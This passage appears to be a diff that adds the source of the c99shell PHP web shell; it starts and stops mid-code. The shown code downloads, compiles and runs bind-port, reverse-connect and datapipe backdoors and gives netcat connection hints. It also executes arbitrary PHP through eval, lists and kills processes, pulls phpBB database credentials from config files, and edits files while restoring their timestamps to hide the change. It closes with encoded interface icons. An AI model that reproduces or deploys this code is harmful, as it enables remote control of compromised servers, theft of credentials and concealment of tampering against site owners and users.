    "; + echo ""; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } + } + if (!empty($dpsubmit)) + { + echo "Result of datapipe-running:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";} + } + echo "
    "; + } + } + ?>Binding port:
    Port: "> Password: ">  
    +Back connection:
    HOST: "> Port: ">  
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    +Datapipe:
    HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server.Processes:

    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = TRUE;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,TRUE)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa". +"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==", +"sort_desc"=> +"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb". +"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=", +"sql_button_drop"=> +"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". +"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A". +"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z". +"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA". +"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/". +"AQEAOw==", +"sql_button_empty"=> +"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/". +"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm". +"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/". +"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm". +"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/". +"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm". +"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/". +"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ". +"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA". +"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ". 